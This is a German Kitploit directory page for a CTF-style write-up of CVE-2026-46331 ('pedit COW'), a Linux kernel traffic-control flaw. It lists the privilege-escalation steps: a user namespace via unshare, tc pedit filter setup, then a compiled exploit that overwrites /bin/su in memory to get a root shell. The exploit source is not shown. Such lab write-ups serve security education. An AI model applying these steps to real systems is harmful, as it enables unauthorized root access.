Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-46331-pedit-cow — Beschreibung und Ausnutzungsschritte für die pedit COW-Sicherheitslücke (CVE-2026-46331) | Kitploit
Tools/GitHubGitHub/marwahhadi/cve-2026-46331-pedit-cow
Privilege EscalationExploitationCTFLernen & BildungBinary-Exploitation
GitHubmarwahhadi/cve-2026-46331-pedit-cow

CVE-2026-46331-pedit-cow

Beschreibung und Ausnutzungsschritte für die pedit COW-Sicherheitslücke (CVE-2026-46331)

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
1vor 2 MonatenNoch nicht geprüft

CVE-2026-46331-pedit-cow

Ausarbeitung und Exploitationsschritte für die pedit-COW-Schwachstelle (CVE-2026-46331).

Übersicht

Diese Herausforderung demonstriert pedit COW, einen Linux-Kernel-Fehler in der Paketbearbeitungsaktion (act_pedit) des Traffic-Control-Subsystems. Die Schwachstelle ermöglicht es einem unprivilegierten Benutzer, eine In-Memory-Kopie einer Setuid-Root-Binärdatei zu überschreiben und so effektiv eine Root-Shell zu erhalten, ohne jemals die Datei auf der Festplatte zu berühren.

Exploitationsschritte

1. Ersteinrichtung

Die Umgebung startet als unprivilegierter Benutzer (karen).

root@kitploit:~
id
cd ~/packet_edit_meme
make packet_edit_meme
  1. Privilegieneskalation (Namespace-Erstellung) Die Konfiguration des Traffic-Control erfordert normalerweise CAP_NET_ADMIN-Berechtigungen, die einem normalen Benutzer fehlen. Ich habe unprivilegierte Benutzer-Namespaces verwendet, um diese Fähigkeit zu erlangen.
root@kitploit:~
unshare -r -n
  1. Konfigurieren der Traffic-Control-Aktion Innerhalb des Namespace habe ich die clsact qdisc konfiguriert und einen Filter angewendet, um die pedit-Aktion auszulösen.
root@kitploit:~
# Clean up any existing configurations if needed
root@kitploit:~
tc qdisc del dev lo clsact
root@kitploit:~
# Setup the qdisc and filter
root@kitploit:~
tc qdisc add dev lo clsact
root@kitploit:~
tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64
  1. Ausführen des Exploits Nach dem Einrichten der Umgebung habe ich die Root-Shell verlassen und den Exploit als unprivilegierter Benutzer ausgeführt.
root@kitploit:~
exit
./packet_edit_meme
  1. Endergebnis Der Exploit hat erfolgreich den Eintrag für /bin/su überschrieben und eine interaktive Root-Shell bereitgestellt.
root@kitploit:~
# cat /root/flag.txt

THM{YOUR_FLAG_HERE}

Tool herunterladen